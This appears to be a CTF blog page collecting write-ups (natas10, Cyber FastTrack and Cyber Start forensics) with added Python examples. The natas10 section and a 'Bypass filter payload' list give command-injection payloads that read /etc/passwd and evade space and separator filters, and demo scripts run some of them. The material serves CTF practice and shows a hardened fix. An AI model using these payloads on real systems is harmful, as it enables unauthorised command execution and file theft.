Posts

Command Injection --Write-up for natas10

Problem: https://overthewire.org/wargames/natas/natas10.html
Step 1: view the source. The code filters three characters from the input: ';', '|' and '&'. Whatever is typed into the input box is handed to grep as the pattern to search for in 'dictionary.txt'. So we cannot avoid running 'grep', and the filter stops us from chaining a second command of our own with the usual separators.
Step 2: make grep do the work. 'grep .*' matches every line of a file, so it behaves like 'cat'. The command is: grep .* /etc/passwd
Step 3: comment out dictionary.txt. The original grep would also search 'dictionary.txt', which does not contain what we need, so we use '#' to comment out the rest of the command line (this works because the input is pasted into a shell command line unquoted). The command is: grep .* /etc/passwd # dictionary.txt
Step 4: find the path of the password fi...
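The trick in steps 2 and 3 only works because the input lands unquoted in a shell command line. Below is an added example (not the natas source, and not the challenge's files) that mirrors the natas10 logic in Python: the same three-character blacklist, the same `grep -i $key dictionary.txt` command, and, beside it, the fixed version that never starts a shell. The dictionary and the `secret.txt` stand-in for the password file are constructed; the real path is not reproduced.

```python
import os
import re
import subprocess
import tempfile

# Constructed stand-ins for the challenge's files; the real password file
# and its path are not reproduced here.
DICTIONARY = "apple\nbanana\ncherry\n"
SECRET = "natas11-password-placeholder\n"

ILLEGAL = re.compile(r"[;|&]")   # the natas10 blacklist


def vulnerable_search(key, workdir):
    """Same shape as the natas10 code: blacklist three characters, then
    paste the input unquoted into a shell command line."""
    if ILLEGAL.search(key):
        return "Input contains an illegal character!"
    cmd = f"grep -i {key} dictionary.txt"
    # The unquoted '.*' is also a shell glob: in a directory without dotfiles
    # it expands to '. ..', which still works, because the pattern '.' then
    # matches every non-empty line of the file that follows it.
    out = subprocess.run(["sh", "-c", cmd], cwd=workdir,
                         capture_output=True, text=True)
    return out.stdout


def hardened_search(key, workdir):
    """Fix: no shell at all. The input is a single argv element, so '#' and
    spaces are just characters in the pattern, and '--' stops grep from
    reading a leading '-' as an option."""
    out = subprocess.run(["grep", "-i", "--", key, "dictionary.txt"],
                         cwd=workdir, capture_output=True, text=True)
    return out.stdout


def demo():
    """Run the blocked payload, the grep-as-cat payload, and the hardened
    version against a throwaway copy of the files."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "dictionary.txt"), "w") as f:
            f.write(DICTIONARY)
        with open(os.path.join(d, "secret.txt"), "w") as f:
            f.write(SECRET)
        return {
            "blocked": vulnerable_search("x; cat secret.txt", d),
            "grep_as_cat": vulnerable_search(".* secret.txt #", d),
            "hardened": hardened_search(".* secret.txt #", d),
        }


if __name__ == "__main__":
    for name, output in demo().items():
        print(f"{name}: {output!r}")
```

The blacklist catches `;`, but `.* secret.txt #` passes it and the shell turns the rest of the line into a comment, so the secret comes back through grep. Against the no-shell version the same input is just an odd pattern that matches nothing in the dictionary.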

iptables: Bypass firewall

Audacity: decrypt Morse code

Problem: find the flag hidden in the wav file. Tool: Audacity
Step 1: open the wav file in Audacity. The waveform looks very uniform, so it is probably binary or Morse code.
Step 2: transcribe the waveform as Morse code (short pulse = dot, long pulse = dash, a longer silence = letter gap, the longest silence = word gap):
- .. -- . / - --- / ..-. .-.. .. .--. / - .... . / ... . -- .. - -.-. ....
which reads: TIME TO FLIP THE SEMITCH
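Reading dots and dashes off a waveform by eye is fine for a short clip; for a longer one it helps to write down the pulse lengths and let a script do the rest. The following is an added example (not part of the original post): a timing-to-Morse converter plus a decoder, checked against the Morse string transcribed above. The pulse list is constructed for the example, not measured from the challenge file.

```python
MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "..--.-": "_", "-....-": "-", ".-.-.-": ".", "--..--": ",",
}

# Morse timing: a dash is 3 dits long, the gap inside a letter is 1 dit,
# between letters 3 dits, between words 7 dits.


def pulses_to_morse(pulses, unit_ms):
    """pulses: (tone_ms, silence_ms) pairs read off the waveform; unit_ms is
    the length of one dit. Returns '.'/'-' with ' ' between letters and
    ' / ' between words, the notation used in the write-up."""
    out = []
    for tone, silence in pulses:
        out.append("." if tone < 2 * unit_ms else "-")
        if silence >= 5 * unit_ms:      # word gap (nominally 7 units)
            out.append(" / ")
        elif silence >= 2 * unit_ms:    # letter gap (nominally 3 units)
            out.append(" ")
    return "".join(out).strip()


def decode_morse(code):
    """Letters separated by spaces, words by '/'; unknown symbols become '?'."""
    words = []
    for word in code.split("/"):
        words.append("".join(MORSE_TABLE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


# The transcription from the write-up.
PAGE_MORSE = "- .. -- . / - --- / ..-. .-.. .. .--. / - .... . / ... . -- .. - -.-. ...."

# Constructed pulse list (tone, silence) in ms spelling "TI TO" at 100 ms per dit.
SAMPLE_PULSES = [(300, 300), (100, 100), (100, 700),
                 (300, 300), (300, 100), (300, 100), (300, 0)]

if __name__ == "__main__":
    print(decode_morse(PAGE_MORSE))
    print(pulses_to_morse(SAMPLE_PULSES, 100), "->",
          decode_morse(pulses_to_morse(SAMPLE_PULSES, 100)))
```

The thresholds (2 and 5 units) sit between the nominal values, so a hand-keyed or slightly stretched recording still classifies correctly.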

Bypass filter payload

Basic command injection in an input box:
1; ls
1 && ls
1 | ls
1 || ls    (runs ls only if the first command fails)
`ls`
$(ls)
Bypassing a filter that blocks spaces:
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"hello"${IFS}&&cat${IFS}/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
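To see that every one of the space-less payloads really executes, here is an added example (not from the original post) that feeds them through a naive whitespace filter and then runs them the way a vulnerable application would, unquoted in bash. The target file and its path are constructed; brace expansion and `$'...'` are bash features, so `bash -c` rather than `sh -c` is used on purpose.

```python
import os
import subprocess
import tempfile

# A naive filter of the kind these payloads defeat: it rejects whitespace
# but lets every other character through.
BLOCKED = set(" \t")


def passes_filter(payload):
    return not any(ch in BLOCKED for ch in payload)


def run_in_bash(payload):
    """Run the payload as a vulnerable app would: unquoted, in bash."""
    out = subprocess.run(["bash", "-c", payload], capture_output=True, text=True)
    return out.stdout


def bypass_results():
    """Each payload reads a constructed target file without using a space."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "secret.txt")   # constructed path, no spaces in it
        with open(target, "w") as f:
            f.write("top-secret\n")
        payloads = {
            "redirect":   f"cat<{target}",                            # stdin redirection
            "brace":      f"{{cat,{target}}}",                        # brace expansion
            "ifs":        f"cat$IFS{target}",                         # $IFS as separator
            "ifs_braces": f"echo${{IFS}}hello${{IFS}}&&cat${{IFS}}{target}",
            "hex_space":  f"X=$'cat\\x20{target}'&&$X",               # \x20 inside $'...'
        }
        results = {}
        for name, payload in payloads.items():
            if not passes_filter(payload):
                raise ValueError(f"{name} contains a blocked character")
            results[name] = run_in_bash(payload)
    return results


if __name__ == "__main__":
    for name, output in bypass_results().items():
        print(f"{name:11}: {output!r}")
```

The lesson for the defender is the same as in the natas10 write-up: a character blacklist can always be worked around, so pass user input as a separate argv element instead of building a command line.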

Volatility: analysing a 'vmem' memory image ----write-up of 'fi02' in Cyber FastTrack

Problem: analyse a memory image and find the text that was being written in Notepad. Hint: the string ends with 'y', and the character contains an extra 'y'; don't submit two 'y's. Tool: Volatility
Solution:
Step 1: select a profile. First check what the memory image is: $ vol.py -f memory-image.vmem imageinfo  The profile of this machine is Win7SP1x64.
Step 2: view the running processes. Notepad was being used to write, so the process should still be running in the background: $ vol.py -f memory-image.vmem --profile=Win7SP1x64 cmdline  This gives the pid of the notepad process, which is 2740.
Step 3: get the memory of notepad's process. Dumping pid 2740 produces '2740.dmp', the addressable memory of the process: $ vol.py -f memory-image.vmem --profile=Win7SP1x64 -p 2740 memdump --dump-dir .
Step 4: find the strings. Because the string ends with a '...
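One thing that catches people at step 4: Win32 edit controls, Notepad included, keep their text as UTF-16LE, so plain `strings` over 2740.dmp misses it (every letter is followed by a 0x00 byte; `strings -e l` is the usual fix). The example below is an added one, not part of the original write-up: it scans a dump for runs of printable UTF-16LE and narrows them to the hint (the text ends with 'y'). The dump bytes are constructed for the example, not taken from the challenge image.

```python
import re

# Assumption for the example: the Notepad text lives in the process dump as
# UTF-16LE, as Win32 edit controls store it. SAMPLE_DUMP is constructed.


def utf16le_strings(blob, min_len=6):
    """Runs of at least min_len printable ASCII characters encoded as UTF-16LE."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(blob)]


def ascii_strings(blob, min_len=6):
    """What `strings` finds with default settings."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def candidates_ending_with(blob, suffix="y", min_len=6):
    """Apply the challenge hint: keep only UTF-16LE strings ending with `suffix`."""
    return [s for s in utf16le_strings(blob, min_len) if s.rstrip().endswith(suffix)]


# Constructed slice of a process dump: an ANSI path (visible to `strings`),
# a UTF-16LE window title, and a UTF-16LE line of typed text.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"C:\\Windows\\System32\\notepad.exe\x00"
    + b"\x90" * 8
    + "Untitled - Notepad".encode("utf-16-le")
    + b"\x00" * 8
    + "the note typed into notepad ends with y".encode("utf-16-le")
    + b"\xff" * 4
)

if __name__ == "__main__":
    print("ascii  :", ascii_strings(SAMPLE_DUMP))
    print("utf16le:", utf16le_strings(SAMPLE_DUMP))
    print("hint   :", candidates_ending_with(SAMPLE_DUMP))
```

On a real 2740.dmp the UTF-16LE list is long (window titles, menu text, file dialogs), which is exactly why filtering on the hint's trailing character is worth doing.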

Got 20th in Cyber FastTrack CTF 2020

Cyber Start: My first CTF competition was on 14 Feb 2020; it was also my first contact with CTF. It was hosted by our university's IT department. I finished all the challenges in 5 minutes. This sparked my interest in CTF.
Cyber Start & Girls Cyber Start: After the competition at my university, I moved on to Girls Cyber Start to continue with CTF. When I had done more than half of the challenges, my university asked us to play the Cyber Start game on behalf of our school. The challenges are identical to those in Girls Cyber Start. I did both of them because I was told that the scores could not be merged.
Cyber FastTrack: It was my third competition, and maybe the first official one. I got 20th place. I found that I am very good at digital forensics, web and log analysis. I also found that binary carries a lot of weight, so I should spend more time practising it.

Autopsy: analysing a disk image ----write-up of 'fi03' in Cyber FastTrack

Problem: analyse a Windows disk image. Tools: Kali, Autopsy
Step 1: Kali ships with Autopsy, so I don't need to install it, but it has to be run as root.
Step 2: open the URL in the browser and create a case to load the image.
Problem 1: find the hostname of the computer.
Step 1: Windows event logs always record the hostname, so I found the path of the event log file and opened it as hex. It was not easy to read that way, so I exported it and opened it in a Windows virtual machine.
Step 2: in Windows, I gave the file the 'evtx' extension and double-clicked it to read its contents. The host name is 'RESARCH-LAB-42'.
Problem 2: find the user's customised scheduled task, including all of its arguments, path and command.
Step 1: find the task path on Windows. Scheduled tasks are stored in C:\Windows\System32\Tasks. There is a folder named 'Not a CRON', it is very...
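The files under C:\Windows\System32\Tasks are UTF-16 XML, and the command, arguments and working directory all sit under Actions/Exec, so once the Tasks folder is exported from Autopsy a few lines of Python pull every task out at once. This is an added example, not part of the original write-up: the task file below is constructed in the shape of a real one (author, user and command are made up), and `scan_tasks_dir` walks an exported Tasks folder.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Namespace used by every task file under C:\Windows\System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task file in the shape of a real one (made-up user and command).
# Task files on disk are UTF-16 with a BOM, hence the encode().
SAMPLE_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>LAB\alice</Author>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2020-01-01T09:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>LAB\alice</UserId></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Tools\sync.exe</Command>
      <Arguments>--upload --target http://example.invalid/</Arguments>
      <WorkingDirectory>C:\Tools</WorkingDirectory>
    </Exec>
  </Actions>
</Task>
""".encode("utf-16")


def parse_task(raw):
    """Pull the fields an analyst wants out of one task file."""
    root = ET.fromstring(raw)

    def text(path):
        el = root.find(path, NS)
        return el.text if el is not None else None

    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
        "working_dir": text("t:Actions/t:Exec/t:WorkingDirectory"),
        "start": text("t:Triggers//t:StartBoundary"),
    }


def scan_tasks_dir(tasks_root):
    """Walk an exported Tasks folder; skip files that are not task XML."""
    found = []
    for dirpath, _, files in os.walk(tasks_root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                try:
                    info = parse_task(f.read())
                except ET.ParseError:
                    continue
            info["task_path"] = os.path.relpath(path, tasks_root)
            found.append(info)
    return found


def demo_scan():
    """Write the constructed task into a throwaway 'Tasks' tree and scan it."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "Not a CRON"))
        with open(os.path.join(d, "Not a CRON", "Sync"), "wb") as f:
            f.write(SAMPLE_TASK)
        with open(os.path.join(d, "junk.bin"), "wb") as f:
            f.write(b"\x00\x01not xml")
        return scan_tasks_dir(d)


if __name__ == "__main__":
    for task in demo_scan():
        print(task)
```

Real Tasks folders hold dozens of Microsoft tasks; sorting the output by author or by command path makes the one odd entry stand out quickly.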

Digital Forensics: complete the file header ----write-up of 'rm03' in Cyber FastTrack

Problem: find the flag in a file. Tools: binwalk, ihex (hex editor), file signature list
Solution:
Step 1: check the file. First I used binwalk; the 'Zlib' compressed data it reported suggested a picture with a hidden message.
Step 2: confirm the file type. Looking at the file in ihex, I found that it ended with 'PNG'.
Step 3: identify the file type. I checked the header of the file against the file signature list at https://www.garykessler.net/library/file_sigs.html
Step 4: complete the file header. Some bytes at the start of the header had been changed, so I changed 'AE42082' to '89504E47' and saved the file. Then I added the extension 'png' and opened it.
Flag: Are_Shoes_Hats_For_Feet
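The edit in step 4 restores the first four bytes of the eight-byte PNG signature (89 50 4E 47 0D 0A 1A 0A). Before patching bytes by hand it is worth checking that the rest of the file really is a PNG: the remaining four signature bytes, the IHDR chunk type at offset 12, and the IHDR CRC. The block below is an added example, not part of the original write-up; it builds a tiny valid PNG from scratch (constructed), damages the signature the way the challenge did, verifies the tail, and repairs it.

```python
import struct
import zlib

PNG_SIG = bytes.fromhex("89504E470D0A1A0A")   # \x89 'PNG' \r \n \x1a \n


def _chunk(ctype, body):
    """Length, type, data, CRC-32 over type+data: the PNG chunk layout."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_tiny_png():
    """A valid 1x1 red RGB PNG built from scratch (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter 0 + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def damaged_signature(png, junk=b"\xde\xad\xbe\xef"):
    """Overwrite the first four signature bytes (junk value is made up)."""
    return junk + png[4:]


def looks_like_damaged_png(data):
    """Tail of the signature, IHDR chunk type and a valid IHDR CRC present,
    but the leading bytes wrong."""
    if len(data) < 33 or data[:8] == PNG_SIG:
        return False
    if data[4:8] != PNG_SIG[4:8] or data[12:16] != b"IHDR":
        return False
    length = struct.unpack(">I", data[8:12])[0]
    body = data[12:16 + length]                     # chunk type + data
    crc = struct.unpack(">I", data[16 + length:20 + length])[0]
    return zlib.crc32(body) & 0xFFFFFFFF == crc


def repair_png_signature(data):
    """Put the full signature back; refuse if the tail does not check out."""
    if not looks_like_damaged_png(data):
        raise ValueError("not a PNG with a damaged signature")
    return PNG_SIG + data[8:]


def png_dimensions(data):
    """Width and height from IHDR, a quick sanity check after the repair."""
    return struct.unpack(">II", data[16:24])


if __name__ == "__main__":
    good = make_tiny_png()
    bad = damaged_signature(good)
    print("damaged:", bad[:8].hex(), "->", repair_png_signature(bad)[:8].hex())
    print("size:", png_dimensions(repair_png_signature(bad)))
```

The CRC check matters: if the challenge had also flipped bits inside IHDR, restoring the signature alone would give a file viewers still refuse, and the next thing to look at would be the chunk CRCs.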

Digital Forensics: decode a cipher ----write-up of 'cm08' in Cyber FastTrack

Problem: decode the cipher in a text file. Tools: ihex, Python, Sublime
Solution:
Step 1: open the file. It is a text file, and when I opened it I saw some invisible characters in it.
Step 2: open it in ihex. It was odd that there were so many 'C3' bytes in it.
Step 3: find the trick. I copied the bytes and removed all the 'C3's: 86 AC A1 A7 C2 BA 8D A1 B3 B4 A5 B2 9F 8F A6 9F 93 B7 A9 B4 A3 A8 A9 AE A7 9F 82 A9 B4 B3 0A. The difference between 'A1' and 'A7' is 6, so I guessed they might be 'a' and 'g' in the word 'flag'. I then subtracted an offset of 64 so that 'A1' prints as 0x61, the ASCII code of 'a', and printed all of them.
Output: Flag?zMaster_Of_Switching_Bits (the '?' is the unprintable byte 0xC2 - 64 = 0x82; 'C2' is itself a UTF-8 lead byte like 'C3', so the pair 'C2 BA' encodes a single character that the subtraction splits in two).
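The C3 bytes are UTF-8 lead bytes: every character of the plaintext had 0x80 added (its high bit set), and the result was saved as UTF-8, which encodes 0xC0-0xFF as C3 xx and 0x80-0xBF as C2 xx. Stripping C3 and subtracting 64 from the continuation bytes recovers every character except the one that got a C2 lead instead. The block below is an added example, not part of the original write-up: it reproduces the write-up's decoding, then puts the C3 bytes back (assumption: every high byte in the list except the surviving 'C2 BA' pair was preceded by C3 in the file) and decodes properly by clearing the high bit after UTF-8 decoding.

```python
# The byte list from the write-up, after the 'C3' lead bytes were removed.
STRIPPED = bytes.fromhex(
    "86 AC A1 A7 C2 BA 8D A1 B3 B4 A5 B2 9F 8F A6 9F 93 B7 A9 B4 A3 A8 A9 AE A7 9F 82 A9 B4 B3 0A"
)


def writeup_decode(stripped):
    """The write-up's method: subtract 64 from each byte and print it
    (bytes below 64, here only the trailing newline, are left alone)."""
    return "".join(chr(b - 64) if b >= 64 else chr(b) for b in stripped)


def restore_lead_bytes(stripped):
    """Undo the 'remove all C3' step. Assumption: every high byte except the
    surviving 'C2 BA' pair was preceded by C3 in the original file."""
    out = bytearray()
    i = 0
    while i < len(stripped):
        b = stripped[i]
        if b == 0xC2:                  # a lead byte the write-up did not strip
            out += stripped[i:i + 2]
            i += 2
        elif b >= 0x80:                # a continuation byte: put C3 back in front
            out += b"\xc3" + bytes([b])
            i += 1
        else:                          # plain ASCII (the trailing newline)
            out.append(b)
            i += 1
    return bytes(out)


def clean_decode(raw):
    """Decode the UTF-8 first, then clear the high bit of every code point.
    This undoes 'add 0x80 to each character, save as UTF-8' in one step and
    does not depend on which lead byte (C2 or C3) each character received."""
    return "".join(chr(ord(c) & 0x7F) for c in raw.decode("utf-8"))


if __name__ == "__main__":
    print(repr(writeup_decode(STRIPPED)))
    print(repr(clean_decode(restore_lead_bytes(STRIPPED))))
```

The two results differ only at the fifth character: the write-up's 0x82 followed by 'z' is one character, ':', whose transformed value 0xBA sits in the C2 range.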

Autopsy: find the remote computer name ----write-up for Cyber Start L4 C1

Problem: find the name of the remote computer. Tools: evtx_view, Autopsy
Step 1: export the Security event log from the image, because logon events are stored in 'Security.evtx'.
Step 2: use evtx_view to dump the content of the log into a file 'result'. We could also import it into a Windows VM to inspect it, but dumping it to a text file makes it much easier to filter: python evtx_dump.py ~/Desktop/evtx_view.v.1.06.osx/111.evtx > result
From https://eventlogxp.com/blog/logon-type-what-does-it-mean/ the Windows logon types that indicate a remote logon are:
Logon type 3: Network. A user or computer logged on to this computer from the network.
Logon type 8: NetworkCleartext. A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the ...
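Once the log is dumped as XML, the remote machine name is in the EventData of each successful logon (event 4624) as WorkationName, next to IpAddress, and the LogonType field says whether the session came over the network. Below is an added example, not part of the original write-up: a filter that keeps only network-type 4624 events and reports who came from where. The records are constructed in the shape of evtx_dump.py's XML output (the events namespace is the real one; the host, users and addresses are made up), and type 10 (RemoteInteractive, i.e. RDP) is included alongside 3 and 8.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Logon types that mean the session came in over the network.
REMOTE_LOGON_TYPES = {3: "Network", 8: "NetworkCleartext", 10: "RemoteInteractive"}


def _event(event_id, logon_type, user, workstation, ip, when):
    """One constructed Security event record in evtx_dump.py's XML shape."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID Qualifiers="">{event_id}</EventID>
    <TimeCreated SystemTime="{when}"/>
    <Computer>VICTIM-PC</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data>
    <Data Name="LogonType">{logon_type}</Data>
    <Data Name="WorkstationName">{workstation}</Data>
    <Data Name="IpAddress">{ip}</Data>
  </EventData>
</Event>"""


# Constructed dump: a local logon, a network logon, a logoff and an RDP logon.
SAMPLE_DUMP = "<Events>\n" + "\n".join([
    _event(4624, 2, "alice", "VICTIM-PC", "-", "2020-02-14 08:55:01"),
    _event(4624, 3, "alice", "DESKTOP-7F3K2", "10.0.0.5", "2020-02-14 09:12:44"),
    _event(4634, 3, "alice", "-", "-", "2020-02-14 09:13:02"),
    _event(4624, 10, "admin", "ADMIN-LAPTOP", "10.0.0.9", "2020-02-14 21:40:17"),
]) + "\n</Events>"


def remote_logons(xml_text):
    """Successful logons (4624) whose LogonType indicates a network session,
    with the remote workstation name and address taken from EventData."""
    root = ET.fromstring(xml_text)
    hits = []
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4624":
            continue
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        logon_type = int(data.get("LogonType", -1))
        if logon_type not in REMOTE_LOGON_TYPES:
            continue
        hits.append({
            "time": ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
            "user": data.get("TargetUserName"),
            "logon_type": logon_type,
            "kind": REMOTE_LOGON_TYPES[logon_type],
            "workstation": data.get("WorkstationName"),
            "ip": data.get("IpAddress"),
        })
    return hits


if __name__ == "__main__":
    for hit in remote_logons(SAMPLE_DUMP):
        print(hit)
```

A dump of a real Security.evtx is mostly type 5 (service) and type 2 (interactive) noise, which is why filtering on LogonType first, rather than reading the file top to bottom, gets to the remote workstation name fast.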

binary buffer overflow

analysing a pcap file